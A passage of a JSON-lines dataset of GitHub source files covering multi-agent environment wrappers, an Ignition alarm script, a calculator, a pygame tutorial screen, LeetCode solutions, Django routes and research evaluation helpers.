self.n_agents = self.metadata['n_agents']\n new_spaces = {}\n for k, v in self.observation_space.spaces.items():\n # If obs is a self obs, then we only want to include other agents obs,\n # as we will pass the self obs separately.\n assert len(v.shape) > 1, f'Obs {k} has shape {v.shape}'\n if 'mask' in k and k not in self.keys_self_matrices:\n new_spaces[k] = v\n elif k in self.keys_self_matrices:\n new_spaces[k] = Box(low=v.low[:, 1:], high=v.high[:, 1:], dtype=v.dtype)\n elif k in self.keys_self:\n assert v.shape[0] == self.n_agents, \\\n f\"For self obs, obs dim 0 should equal number of agents. {k} has shape {v.shape}\"\n obs_shape = (v.shape[0], self.n_agents - 1, v.shape[1])\n lows = np.tile(v.low, self.n_agents - 1).reshape(obs_shape)\n highs = np.tile(v.high, self.n_agents - 1).reshape(obs_shape)\n new_spaces[k] = Box(low=lows, high=highs, dtype=v.dtype)\n elif k in self.keys_copy:\n new_spaces[k] = deepcopy(v)\n else:\n obs_shape = (v.shape[0], self.n_agents, v.shape[1])\n lows = np.tile(v.low, self.n_agents).reshape(obs_shape).transpose((1, 0, 2))\n highs = np.tile(v.high, self.n_agents).reshape(obs_shape).transpose((1, 0, 2))\n new_spaces[k] = Box(low=lows, high=highs, dtype=v.dtype)\n\n for k in self.keys_self:\n new_spaces[k + '_self'] = self.observation_space.spaces[k]\n\n self.observation_space = Dict(new_spaces)\n\n def observation(self, obs):\n new_obs = {}\n for k, v in obs.items():\n # Masks that aren't self matrices should just be copied\n if 'mask' in k and k not in self.keys_self_matrices:\n new_obs[k] = obs[k]\n # Circulant self matrices\n elif k in self.keys_self_matrices:\n new_obs[k] = self._process_self_matrix(obs[k])\n # Circulant self keys\n elif k in self.keys_self:\n new_obs[k + '_self'] = obs[k]\n new_obs[k] = obs[k][circulant(np.arange(self.n_agents))]\n new_obs[k] = new_obs[k][:, 1:, :] # Remove self observation\n elif k in self.keys_copy:\n new_obs[k] = obs[k]\n # Everything else should just get copied for each agent (e.g. external obs)\n else:\n new_obs[k] = np.tile(v, self.n_agents).reshape([v.shape[0], self.n_agents, v.shape[1]]).transpose((1, 0, 2))\n\n return new_obs\n\n def _process_self_matrix(self, self_matrix):\n '''\n self_matrix will be a (n_agent, n_agent) boolean matrix. Permute each row such that the matrix is consistent with\n the circulant permutation used for self observations. E.g. this should be used for agent agent masks\n '''\n assert np.all(self_matrix.shape[:2] == np.array((self.n_agents, self.n_agents))), \\\n f\"The first two dimensions of {self_matrix} were not (n_agents, n_agents)\"\n\n new_mat = self_matrix.copy()\n # Permute each row to the right by one more than the previous\n # E.g., [[1,2],[3,4]] -> [[1,2],[4,3]]\n idx = circulant(np.arange(self.n_agents))\n new_mat = new_mat[np.arange(self.n_agents)[:, None], idx]\n new_mat = new_mat[:, 1:] # Remove self observation\n return new_mat\n\n\nclass SelectKeysWrapper(gym.ObservationWrapper):\n \"\"\"\n Select keys for final observations.\n Expects that all observations come in shape (n_agents, n_objects, n_dims)\n Args:\n keys_self (list): observation names that are specific to an agent\n These will be concatenated into 'observation_self' observation\n keys_other (list): observation names that should be passed through\n flatten (bool): if true, internal and external observations\n \"\"\"\n\n def __init__(self, env, keys_self, keys_other, flatten=False):\n super().__init__(env)\n self.keys_self = sorted([k + '_self' for k in keys_self])\n self.keys_other = sorted(keys_other)\n self.flatten = flatten\n\n # Change observation space to look like a single agent observation space.\n # This makes constructing policies much easier\n if flatten:\n size_self = sum([np.prod(self.env.observation_space.spaces[k].shape[1:])\n for k in self.keys_self + self.keys_other])\n self.observation_space = Dict(\n {'observation_self': Box(-np.inf, np.inf, (size_self,), np.float32)})\n else:\n size_self = sum([self.env.observation_space.spaces[k].shape[1]\n for k in self.keys_self])\n obs_self = {'observation_self': Box(-np.inf, np.inf, (size_self,), np.float32)}\n obs_extern = {k: Box(-np.inf, np.inf, v.shape[1:], np.float32)\n for k, v in self.observation_space.spaces.items()\n if k in self.keys_other}\n obs_self.update(obs_extern)\n self.observation_space = Dict(obs_self)\n\n def observation(self, observation):\n if self.flatten:\n other_obs = [observation[k].reshape((observation[k].shape[0], -1))\n for k in self.keys_other]\n obs = np.concatenate([observation[k] for k in self.keys_self] + other_obs, axis=-1)\n return {'observation_self': obs}\n else:\n obs = np.concatenate([observation[k] for k in self.keys_self], -1)\n obs = {'observation_self': obs}\n other_obs = {k: v for k, v in observation.items() if k in self.keys_other}\n obs.update(other_obs)\n return obs\n","repo_name":"openai/multi-agent-emergence-environments","sub_path":"mae_envs/wrappers/multi_agent.py","file_name":"multi_agent.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","stars":1523,"dataset":"github-code","pt":"5"} +{"seq_id":"73198464151","text":"def getAlarmsPaths(config, currentTagPath, instances=[], templateParams={}, recursive=False, alarmReplace={},\n excludePriority={\"Diagnostic\"}):\n \"\"\"\n recursively search for the alarms in the alarm paths\n :param config: Dict. The configuration result from system.tag.getConfiguration function\n :param currentTagPath: String. The current base tag path.\n :param instances: List. A list consisting of all found alarm paths, for Perspective template repeater\n :param templateParams: Dict. The parameter for template.\n :param recursive: Bool. True to enable recursive search for all alarms under that path\n :param alarmReplace: Dict. Value to replace in the alarm names\n :param excludePriority: Set. Set of alarms with priority to exclude.\n :return:\n \"\"\"\n if 'alarms' in config.keys():\n for alarm in config['alarms']:\n if \"priority\" not in alarm:\n alarm[\"priority\"] = \"Low\"\n if str(alarm[\"priority\"]) in excludePriority:\n continue\n _params = dict(templateParams)\n _name = alarm['name']\n _params[\"displayName\"] = _name if _name not in alarmReplace.keys() else alarmReplace[_name]\n _params[\"tagPath\"] = currentTagPath + \"/Alarms/\" + alarm['name'] + \".IsActive\"\n instances.append(_params)\n\n if 'tags' in config.keys():\n for tag in config['tags']:\n getAlarmsPaths(tag, currentTagPath + \"/\" + str(tag['path']), instances, templateParams, recursive,\n alarmReplace,\n excludePriority)\n\n\ndef loadRepeater(tagPaths, templateParams, sortAsc=True, alarmNameReplaceOrigin=None,\n alarmNameReplaceValue=None, excludePriority=set([]), recursive=True):\n tr_ins = []\n alarmReplace = {}\n if alarmNameReplaceOrigin is not None and alarmNameReplaceValue is not None and len(alarmNameReplaceOrigin) == len(\n alarmNameReplaceValue):\n alarmReplace = {key: value for key, value in zip(alarmNameReplaceOrigin, alarmNameReplaceValue)}\n\n for tagPath in tagPaths:\n if not system.tag.exists(tagPath):\n continue\n\n config = system.tag.getConfiguration(tagPath, recursive)[0]\n getAlarmsPaths(config, str(tagPath), instances=tr_ins,\n templateParams=templateParams, recursive=recursive, alarmReplace=alarmReplace,\n excludePriority=excludePriority)\n\n tr_ins = sorted(tr_ins, key=lambda x: x['displayName'], reverse=sortAsc)\n\n return tr_ins","repo_name":"wendajrrc/alarm-status-repeater","sub_path":"ignition/script-python/AlarmRepeater/Repeater/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13625007327","text":"def userInput():\n while True:\n operation = str(input(\"\"\"Choose an operation: \n a. Add\n b. Subtract\n c. Multiple\n d. Divide\n e. Exit\nChoice: \"\"\"))\n if operation.lower() == 'a':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n print(f\"Sum of {num1} & {num2}:\", addNums(num1, num2))\n tryAgain()\n elif operation.lower() == 'b':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n print(f\"Difference of {num1} & {num2}:\", subtractNums(num1, num2))\n tryAgain()\n elif operation.lower() == 'c':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n print(f\"Product of {num1} & {num2}:\", multiplyNums(num1, num2))\n tryAgain()\n elif operation.lower() == 'd':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n if num2 != 0:\n print(f\"Quotient of {num1} & {num2}:\", divideNums(num1, num2))\n tryAgain()\n else:\n print(\"\"\"\n Invalid input\n Divisor cannot be zero (0) for division.\n \"\"\")\n tryAgain()\n elif operation.lower() == 'e':\n quit()\n break\n else:\n raise Exception\n break\n\ndef addNums(num1, num2):\n sum = num1 + num2\n return sum\n\ndef subtractNums(num1, num2):\n difference = num1 - num2\n return difference\n\ndef multiplyNums(num1, num2):\n product = num1 * num2\n return product\n\ndef divideNums(num1, num2):\n quotient = num1 / num2\n return quotient\n\ndef tryAgain():\n tryAgainChoice = str(input(\"\\nDo you want to try again? Y (yes) or N (no): \"))\n if tryAgainChoice.upper() == 'Y':\n userInput()\n elif tryAgainChoice.upper() == 'N':\n quit()\n else:\n raise Exception\n\ntry:\n userInput()\nexcept Exception:\n print(\"\"\"\n Invalid input\n Use only the appropriate choice for operations.\n \"\"\")\n\n\n","repo_name":"zenpao/Python-Script-Collection","sub_path":"Intermediate Python Programming Essentials/Day 7 [Module,Exceptions]/javier_jentzenpaolo_day7_act2.py","file_name":"javier_jentzenpaolo_day7_act2.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24178885887","text":"import pygame as p\r\nimport sys\r\nimport lvl_1\r\n\r\np.init()\r\np.mixer.init()\r\np.display.set_caption(\"Tower-Madness\")\r\nfont= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',35)\r\nfont_3= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',30)\r\nfont_4= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',50)\r\nfont_1= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',100)\r\nfont_2= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',150)\r\nfont_5= p.font.Font('Fuentes\\\\raidercrusaderpunch.TTF',30)\r\nclock=p.time.Clock()\r\nsize=width,height=1280,720\r\npantalla=p.display.set_mode(size)\r\nbg_image=p.image.load(\"images\\\\fondo-proyecto.png\")\r\nbg_image=bg_image.convert()\r\nboton=p.image.load(\"images\\\\boton.png\")\r\nback=p.image.load(\"images\\\\flecha-regresar.png\")\r\nselect=p.mixer.Sound('efectos\\\\sonido_boton.wav')\r\ntap=p.mixer.Sound('efectos\\\\boton_tap.wav')\r\n#p.mixer.music.load(\"effectos\\\\fondo.wav\")\r\n#p.mixer.music.play(-1)\r\n#p.mixer.music.set_volume(0.2)\r\ncanal1=p.mixer.Channel(0)\r\ncanal2=p.mixer.Channel(1)\r\n#carga de imagenes del teclado\r\ncentro=1280/2\r\nescala=0.7\r\nA=[]\r\nD=[]\r\nS=[]\r\nW=[]\r\nEnter=[]\r\nUp=[]\r\nLeft=[]\r\nDown=[]\r\nRight=[]\r\nMouse_moveL=[]\r\nMouse_moveR=[]\r\nMouse_moveU=[]\r\nMouse_moveD=[]\r\nMouse_clickR=[]\r\nMouse_clickL=[]\r\nborrar=[]\r\nTitulos=[\"MOVIMIENTO\",\"COLOCAR TORRETAS\",\"QUITAR TORRETAS\"]\r\nMovimiento=[]\r\nMovimiento2=[]\r\nMovimiento3=[]\r\nMovimiento4=[]\r\n\"\"\"Colocar_torretas=[]\r\nQuitar_Torretas=[]\r\npaginas=[]\"\"\"\r\nfor i in range(2):\r\n A.append(p.image.load(\"teclado\\\\A\"+str(i)+\".png\").convert_alpha())\r\n D.append(p.image.load(\"teclado\\\\D\"+str(i)+\".png\").convert_alpha())\r\n S.append(p.image.load(\"teclado\\\\S\"+str(i)+\".png\").convert_alpha())\r\n W.append(p.image.load(\"teclado\\\\W\"+str(i)+\".png\").convert_alpha())\r\n Enter.append(p.image.load(\"teclado\\\\enter\"+str(i)+\".png\").convert_alpha())\r\n Up.append(p.image.load(\"teclado\\\\up\"+str(i)+\".png\").convert_alpha())\r\n Left.append(p.image.load(\"teclado\\\\left\"+str(i)+\".png\").convert_alpha())\r\n Down.append(p.image.load(\"teclado\\\\down\"+str(i)+\".png\").convert_alpha())\r\n Right.append(p.image.load(\"teclado\\\\rigth\"+str(i)+\".png\").convert_alpha())\r\n borrar.append(p.image.load(\"teclado\\\\del\"+str(i)+\".png\").convert_alpha())\r\n Mouse_clickL.append(p.image.load(\"teclado\\\\MB\"+str(i)+\".png\").convert_alpha())\r\n Mouse_clickR.append(p.image.load(\"teclado\\\\MB\"+str(i*2)+\".png\").convert_alpha())\r\n Mouse_moveL.append(p.image.load(\"teclado\\\\M\"+str(i)+\".png\").convert_alpha())\r\n Mouse_moveU.append(p.image.load(\"teclado\\\\M\"+str(i*2)+\".png\").convert_alpha())\r\n Mouse_moveR.append(p.image.load(\"teclado\\\\M\"+str(i*3)+\".png\").convert_alpha())\r\n Mouse_moveD.append(p.image.load(\"teclado\\\\M\"+str(i*4)+\".png\").convert_alpha())\r\n A[i]=p.transform.rotozoom(A[i], 0, escala)\r\n D[i]=p.transform.rotozoom(D[i], 0, escala)\r\n S[i]=p.transform.rotozoom(S[i], 0, escala)\r\n W[i]=p.transform.rotozoom(W[i], 0, escala)\r\n Up[i]=p.transform.rotozoom(Up[i], 0, escala)\r\n Left[i]=p.transform.rotozoom(Left[i], 0, escala)\r\n Down[i]=p.transform.rotozoom(Down[i], 0, escala)\r\n Right[i]=p.transform.rotozoom(Right[i], 0, escala)\r\n Mouse_moveL[i]=p.transform.rotozoom(Mouse_moveL[i], 0, escala*4)\r\n Mouse_moveU[i]=p.transform.rotozoom(Mouse_moveU[i], 0, escala*4)\r\n Mouse_moveD[i]=p.transform.rotozoom(Mouse_moveD[i], 0, escala*4)\r\n Mouse_moveR[i]=p.transform.rotozoom(Mouse_moveR[i], 0, escala*4)\r\n Mouse_clickL[i]=p.transform.rotozoom(Mouse_clickL[i], 0, escala*4)\r\n Mouse_clickR[i]=p.transform.rotozoom(Mouse_clickR[i], 0, escala*4)\r\n Enter[i]=p.transform.rotozoom(Enter[i], 0, escala*2)\r\n borrar[i]=p.transform.rotozoom(borrar[i], 0, escala*2)\r\nfor i in range(4):\r\n Movimiento.append(p.image.load(\"teclado\\\\\"+str(i)+\".png\").convert_alpha())\r\n Movimiento[i]=p.transform.rotozoom(Movimiento[i], 0, 0.8)\r\n \r\nfor i in range(3):\r\n Movimiento2.append(p.image.load(\"teclado\\\\\"+str(i+5)+\".png\").convert_alpha())\r\n Movimiento2[i]=p.transform.rotozoom(Movimiento2[i], 0, 0.8)\r\nfor i in range(10):\r\n Movimiento3.append(p.image.load(\"teclado\\\\\"+str(i+8)+\".png\").convert_alpha())\r\n Movimiento3[i]=p.transform.rotozoom(Movimiento3[i], 0, 0.8)\r\n Movimiento4.append(p.image.load(\"teclado\\\\\"+str(i+18)+\".png\").convert_alpha())\r\n Movimiento4[i]=p.transform.rotozoom(Movimiento4[i], 0, 0.8)\r\ndef draw_txt(texto, font, color, surface, x, y):\r\n textobj=font.render(texto, True, color)\r\n textrect=textobj.get_rect(center=(x,y))\r\n #textrect.topleft=( x, y)\r\n surface.blit(textobj,textrect)\r\n\r\ndef controles_1(controles,volumen):\r\n running = True \r\n click=False\r\n al,al1,al2,al3,al4,al5,al6=0,0,3,0,3,0,0\r\n count=0\r\n pos1=180,550\r\n pos2=180,410\r\n pos3=1080,500\r\n color=[(255,255,255),(0,0,0)]\r\n continuar=False\r\n space=False\r\n page=0\r\n while running:\r\n pantalla.blit(bg_image,(0,0))\r\n draw_txt(\"COMO JUGAR\",font_1, (0,0,0),pantalla,centro+13,83)\r\n draw_txt(\"COMO JUGAR\",font_1, (255,255,255),pantalla,centro,80)\r\n draw_txt(\"MOUSE\", font_4, (0,0,0), pantalla, 1090,238)\r\n draw_txt(\"MOUSE\", font_4, (255,255,255), pantalla, 1090,235)\r\n draw_txt(\"TECLADO\", font_4, (0,0,0), pantalla, 180,238)\r\n draw_txt(\"TECLADO\", font_4, (255,255,255), pantalla, 180,235)\r\n draw_txt(Titulos[page], font_4, (0,0,0), pantalla, centro+13, 188)\r\n draw_txt(Titulos[page], font_4, (255,255,255), pantalla, centro, 185)\r\n if al<=2-0.03:\r\n al+=0.03\r\n else:\r\n al=0\r\n count+=1\r\n if al1<4-0.015:\r\n al1+=0.015\r\n else:\r\n al1=0\r\n if al2>=0:#.015:\r\n al2-=0.015\r\n else:\r\n al2=4-0.015\r\n if al5<=2-0.1:\r\n al5+=0.1\r\n else:\r\n al5=0\r\n if al6<10-0.03:\r\n al6+=0.03\r\n else:\r\n al6=0\r\n casilla=False\r\n\r\n if page==0:\r\n if count<3:\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento[int(al1)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n centro_img4=Mouse_moveL[0].get_rect(center=pos3)\r\n pantalla.blit(S[0],centro_img1)\r\n pantalla.blit(A[int(al)],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[0],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[0],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[0],centro_img2)\r\n pantalla.blit(Left[int(al)],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[0],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[0],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveL[int(al)],centro_img4)\r\n elif count>=3 and count<6:\r\n continuar=True\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento[int(al2)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n pantalla.blit(S[0],centro_img1)\r\n pantalla.blit(A[0],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[int(al)],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[0],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[0],centro_img2)\r\n pantalla.blit(Left[0],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[int(al)],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[0],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveR[int(al)],centro_img4)\r\n elif count>=6 and count<8:\r\n if al3<3-0.015:\r\n al3+=0.015\r\n else:\r\n al1=0\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento2[int(al3)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n pantalla.blit(S[0],centro_img1)\r\n pantalla.blit(A[0],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[0],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[int(al)],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[0],centro_img2)\r\n pantalla.blit(Left[0],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[0],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[int(al)],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveU[int(al)],centro_img4)\r\n elif count>=8 and count<10:\r\n if al4>=0.015:\r\n al4-=0.015\r\n else:\r\n al4=2-0.015\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento2[int(al4)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n pantalla.blit(S[int(al)],centro_img1)\r\n pantalla.blit(A[0],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[0],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[0],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[int(al)],centro_img2)\r\n pantalla.blit(Left[0],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[0],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[0],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveD[int(al)],centro_img4)\r\n \r\n else:\r\n count=0\r\n al1,al2,al3,al4=0,3,0,3\r\n elif page==1:\r\n continuar=False\r\n centro_mov=Movimiento3[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento3[int(al6)],centro_mov)\r\n if count>=4 and count<10:\r\n continuar=True\r\n if int(al6)==3 or int(al6)==8:\r\n pantalla.blit(Enter[1],(centro_img1[0]-50,centro_img1[1]-150))\r\n pantalla.blit(Mouse_clickL[1],(centro_img4[0]+50,centro_img4[1]))\r\n else:\r\n pantalla.blit(Enter[0],(centro_img1[0]-50,centro_img1[1]-150))\r\n pantalla.blit(Mouse_clickL[0],(centro_img4[0]+50,centro_img4[1]))\r\n elif page==2:\r\n continuar=False\r\n centro_mov=Movimiento4[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento4[int(al6)],centro_mov)\r\n if count>=4 and count<10:\r\n draw_txt(\"Oprime espacio para jugar\", font_5, color[int(al5)], pantalla, centro, 670)\r\n if int(al6)%2!=0:\r\n pantalla.blit(borrar[1],(centro_img1[0]-50,centro_img1[1]-150))\r\n pantalla.blit(Mouse_clickR[1],(centro_img4[0]+50,centro_img4[1]))\r\n else:\r\n pantalla.blit(borrar[0],(centro_img1[0]-50,centro_img1[1]-150))\r\n pantalla.blit(Mouse_clickR[0],(centro_img4[0]+50,centro_img4[1]))\r\n \r\n if continuar: \r\n draw_txt(\"Oprime espacio para continuar\", font_5, color[int(al5)], pantalla, centro, 670)\r\n if space and page<=2:\r\n space=False\r\n page+=1\r\n count=0\r\n al,al1,al2,al3,al4,al5,al6=0,0,3,0,3,0,0\r\n if page>=3:\r\n lvl_1.game(volumen,controles)\r\n mx,my=p.mouse.get_pos()\r\n boton_b=pantalla.blit(back,(50,630))\r\n if boton_b.collidepoint((mx,my)):\r\n casilla=True\r\n pantalla.blit(bg_image,boton_b,boton_b)\r\n boton_b=pantalla.blit(back,(50,625))\r\n canal1.play(tap)\r\n if click:\r\n running=False\r\n break\r\n #main_menu()\r\n for event in p.event.get():\r\n if event.type==p.QUIT:\r\n p.quit()\r\n sys.exit()\r\n elif event.type==p.KEYDOWN:\r\n if event.key==p.K_ESCAPE:\r\n running==False\r\n break\r\n #main_menu()\r\n if event.key==p.K_SPACE:\r\n space=True\r\n #else:\r\n elif event.type==p.MOUSEBUTTONDOWN:\r\n if event.button==1 and casilla:\r\n click=True\r\n p.display.update()\r\n clock.tick(60)\r\n","repo_name":"Luis-AMB/Turret-madness","sub_path":"Turret-madness/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":12645,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5305697942","text":"class Solution:\n def longestConsecutive(self, nums: list[int]) -> int:\n res = 0\n count = 1\n nums = sorted(nums)\n if len(nums) == 0: # Se a lista for vazia retorna o resultado\n return res\n for i in range(0, len(nums)-1):\n print(nums[i])\n if nums[i] == nums[i+1]: # Verifica se o número é igual ao seguinte, caso for a sequência se mantém\n continue\n elif nums[i+1] - nums[i] == 1: # Se a diferença entre o seguinte e o atual for 1 eles estão em sequência\n count += 1 # Aumenta o contador\n else: # Nesse caso a sequência é quebrada\n if count > res: # Se a atual contagem for maior que o resultado atual eles são atualizados\n res = count\n count = 1 \n res = max(res, count)\n return res\n \n ","repo_name":"BrunoEstrella1707/LeetCodeProblems","sub_path":"LongestConsecutiveSequence.py","file_name":"LongestConsecutiveSequence.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18853468768","text":"class Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n if not coins:\n if amount == 0:\n return 0\n return -1\n dp = [0] + [float(\"inf\")] * amount\n coins.sort()\n for i in xrange(1, amount + 1):\n for coin in coins:\n if i >= coin:\n dp[i] = min(dp[i], dp[i - coin] + 1)\n return dp[amount] if dp[amount] <= amount else -1\n","repo_name":"Joyer0099/Leetcode","sub_path":"Medium/Python/DynamicProgramming/CoinChange.py","file_name":"CoinChange.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18654207115","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('register', views.register),\n path('login', views.login),\n path('logout', views.logout),\n path('home', views.home),\n path('task', views.task),\n path('task_detail/', views.task_detail),\n]","repo_name":"stephfz/exam_prep_cd-django","sub_path":"proyecto_final/apps/tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35120654565","text":"\"\"\"\nСделать все атрибуты класса Dog приватными.\nСделать для каждого атрибута getter и setter используя декораторы.\nВсе change методы удалить\n\"\"\"\nfrom dog import Dog\n\n\ndef main():\n dog1 = Dog()\n dog1.height = 30\n print(dog1.height)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cabronas/TMS87_Maksim","sub_path":"OOP/oop_08.py","file_name":"oop_08.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24929102765","text":"# Written by Naoto Inoue, 2019-04\nimport argparse\nimport time\n\nimport numpy as np\n\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data.datasets.datasets import get_dataset\nfrom scripts.demo import Tester, evaluate_iou\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"config\", type=str)\n parser.add_argument(\"ckpt\", type=str)\n parser.add_argument(\"--conf_thresh\", default=0.5, type=float)\n parser.add_argument(\"--mask_thresh\", default=0.5, type=float)\n parser.add_argument(\"--no_force_label\", action='store_true')\n parser.add_argument(\"--N\", default=0, type=int, help=\"Number of samples used for evaluation.\")\n args = parser.parse_args()\n\n cfg.merge_from_file(args.config)\n name = cfg.DATASETS.TEST[0].split(\"_\")[0]\n dataset = get_dataset(cfg, name, \"test\", False)\n demo = Tester(cfg, min_image_size=dataset.get_img_info(0)[\"height\"],\n conf_thresh=args.conf_thresh, mask_thresh=args.mask_thresh,\n ckpt=args.ckpt)\n\n iou_list, pred_gt_list, time_list = [], [], []\n N = len(dataset) if args.N <= 0 else args.N\n\n for i in range(N):\n start_time = time.time()\n image, boxlist, idx = dataset[i]\n valid_pred_bins = demo.predict(image, not args.no_force_label)\n time_list.append(time.time() - start_time)\n\n gt_bins = [np.array(x.mask, dtype=np.bool) for x in\n boxlist.get_field(\"mask\").masks]\n iou_list_per_image = evaluate_iou(gt_bins, valid_pred_bins)\n\n avg_iou = sum(iou_list_per_image) / len(iou_list_per_image)\n num_pred = sum(p.sum() for p in valid_pred_bins)\n gt_pred = sum(g.sum() for g in gt_bins)\n text = \"ID {:s} AVG {:.3f} PRED/GT {:.2f} PRED {:d} GT {:d}\"\n # print(text.format(dataset.ids[i], avg_iou, num_pred / gt_pred,\n # len(valid_pred_bins), len(gt_bins)))\n iou_list.append(avg_iou)\n pred_gt_list.append(num_pred / gt_pred)\n if i % 100 == 0:\n print(i)\n print(\"Time per image {:.3f}\".format(sum(time_list) / len(time_list)))\n print(\"Total IoU: {:.3f}\".format(sum(iou_list) / len(iou_list)))\n print(\n \"Total PRED/GT: {:.3f}\".format(sum(pred_gt_list) / len(pred_gt_list)))\n","repo_name":"naoto0804/fast-line-drawing-vectorization","sub_path":"scripts/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"5"} +{"seq_id":"32297532036","text":"import pandas as pd\nimport numpy as np\nimport math \n\nfrom ..resources.get_attributes import read_sample_attributes\n\ndef get_samples_info(df_samples, sample, verbose= False):\n if verbose: print(f\"Adding samples info for {sample}\")\n\n # Sanity check\n # Keep only the columns that are in sample_attributes.yml\n df_samples = df_samples[df_samples['sample']==sample]\n\n assert len(df_samples) <= 1, f\"{sample} has more than one line in samples.csv\"\n assert len(df_samples) == 1, f\"{sample} doesn't have a corresponding line in samples.csv\"\n \n df_samples = df_samples.iloc[0]\n \n exp_env = df_samples['exp_env']\n assert exp_env in ['in_vivo','in_vitro'], f\"{exp_env} is not a valid value for exp_env. Should be in_vivo or in_vitro\"\n\n # Load list of mandatory columns and check that they are in samples.csv and not empty for this sample \n sample_attributes = read_sample_attributes()\n for mand in sample_attributes['mandatory']['all'] + sample_attributes['mandatory'][exp_env]:\n assert mand in list(df_samples.index), f\"{mand} is not in samples.csv\"\n assert not df_samples[mand] == np.nan, f\"{mand} is empty in samples.csv for sample {sample}\"\n \n return df_samples.to_dict()\n\ndef get_library_info(df_library, reference, verbose= False):\n if verbose: print(f\"Adding library info for {reference}\")\n\n if df_library is None:\n return {},{}\n # Sanity check\n df_library = df_library[df_library['reference']==reference]\n \n section_translation = {str(ss)+'-'+str(se):s for s,ss,se in zip(df_library['section'],df_library['section_start'],df_library['section_end'])}\n\n df_library.drop(columns = [c for c in df_library.columns if c in ['section_start','section_end','section','reference']], inplace=True)\n \n d = df_library.iloc[0].to_dict()\n for k,v in d.copy().items():\n if type(v) is float:\n if math.isnan(v):\n del d[k]\n \n return d, section_translation\n","repo_name":"rouskinlab/dreem","sub_path":"dreem/aggregate/library_samples.py","file_name":"library_samples.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} 